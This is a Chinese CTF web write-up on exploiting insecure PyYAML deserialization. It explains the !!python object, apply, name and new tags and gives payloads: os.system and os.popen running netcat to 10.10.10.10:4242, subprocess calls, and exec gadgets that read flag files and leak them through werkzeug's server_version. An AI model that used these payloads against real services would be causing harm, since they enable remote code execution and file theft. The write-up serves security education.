CTF-web: Python YAML反序列化利用

PyYAML存在以下几个特殊标签,如果这些标签被不安全的解析,会造成解析漏洞

从 PyYaml 版本 6.0 开始,load 的默认加载器已切换到 SafeLoader,以降低远程代码执行的风险。更新后易受攻击的是 yaml.unsafe_loadyaml.load(input, Loader=yaml.UnsafeLoader)

1.!!python/object:

!!python/object 标签指示 YAML 解析器应该将对应的 YAML 片段解析为一个 Python 对象

python 复制代码
import yaml  
  
class MyClass:  
    def __init__(self, attribute1, attribute2):  
        self.attribute1 = attribute1  
        self.attribute2 = attribute2  
  
    def __repr__(self):  
        return f"MyClass(attribute1={self.attribute1}, attribute2={self.attribute2})"  
  
# 创建一个对象  
obj = MyClass('value1', 'value2')  
  
# 序列化对象为 YAMLyaml_str = yaml.dump(obj)  
print(yaml_str)
复制代码
!!python/object:__main__.MyClass
attribute1: value1
attribute2: value2

2.!!python/object/apply:

!!python/object/apply 标签在 YAML 中用于表示调用一个可调用对象(例如函数或构造函数)并将其结果表示为一个对象。

python 复制代码
import yaml  

yaml.load('!!python/object/apply:print [\'Hello,Word\']', Loader=yaml.UnsafeLoader)
python 复制代码
import yaml  
  
yaml.load('''  
!!python/object/apply:print  
- 'hello world'
''', Loader=yaml.UnsafeLoader)

利用

复制代码
!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
.....

3.!!python/name:

查看以下 YAML 数据:

yaml 复制代码
!!python/name:math.pi

在这个例子中,!!python/name:math.pi 标签指向了 Python 的 math 模块中的 pi 常量。反序列化过程中,PyYAML 会将其解析为 math.pi 的值,即圆周率 3.141592653589793

假设你有一个 Python 函数 add,你想在 YAML 中引用它:

python 复制代码
# example.py

def add(a, b):
    return a + b

你可以在 YAML 文件中这样写:

yaml 复制代码
!!python/name:example.add

在反序列化时,这个 YAML 数据会被解释为 example 模块中的 add 函数。

4.!!python/object/new:

!!python/object/new:允许直接创建新的 Python 对象,而不是通过调用构造函数

语法结构

!!python/object/new 标记的 YAML 语法结构如下:

yaml 复制代码
!!python/object/new:<class>
args:
  - arg1
  - arg2
state:
  attribute1: value1
  attribute2: value2

在这个结构中:

  • <class> 是你想要创建的类的全限定名。
  • args 是一个列表,包含传递给新对象 new 方法的参数。
  • state 是一个映射,包含对象的属性和值。

利用

复制代码
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]

或更复杂的利用

复制代码
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
  1. !!python/object/new:str

    这一标签告诉 PyYAML 创建一个新的 Python str 对象。!!python/object/new:ClassName 是 PyYAML 的特殊标签,用于通过调用类的 __new__ 方法创建对象。

  2. state: !!python/tuple

    这是为 str 对象设置一个属性 state,其值是一个 Python 元组(tuple

  3. update: !!python/name:exec

    这一部分创建了一个新的 Warning 对象,并为其设置了一个 state 属性。state 属性是一个字典,其中 update 键被赋值为 exec 函数。

这段数据等价于

python 复制代码
Warning.update('print(getattr(open("flag.txt"), "read")())')

由于 Warning.update 被指向了 exec 函数,这实际上变成了

python 复制代码
exec('print(getattr(open("flag.txt"), "read")())')

还有更多用法

复制代码
!!python/object/new:type
    args:
     - exp
     - !!python/tuple []
     - {"extend": !!python/name:exec }
    listitems: |
    'python code'

替换server_version常量

复制代码
!!python/object/new:type
        args:
         - exp
         - !!python/tuple []
         - {"extend": !!python/name:exec }
        listitems: |
         r=open("/flag").read()
         import werkzeug
         setattr(werkzeug.serving.WSGIRequestHandler, "server_version",r )

References

PayloadsAllTheThings/Insecure Deserialization/Python.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
Python Yaml Deserialization - hacktricks.xyz
YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13
PyYAML Documentation
Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021
CVE-2019-20477- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt
DASCTF2024最后一战|寒夜破晓,冬至终章 官方WP

本文由A5rZ,整理编写

相关推荐
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1114 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x514 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工14 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x514 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型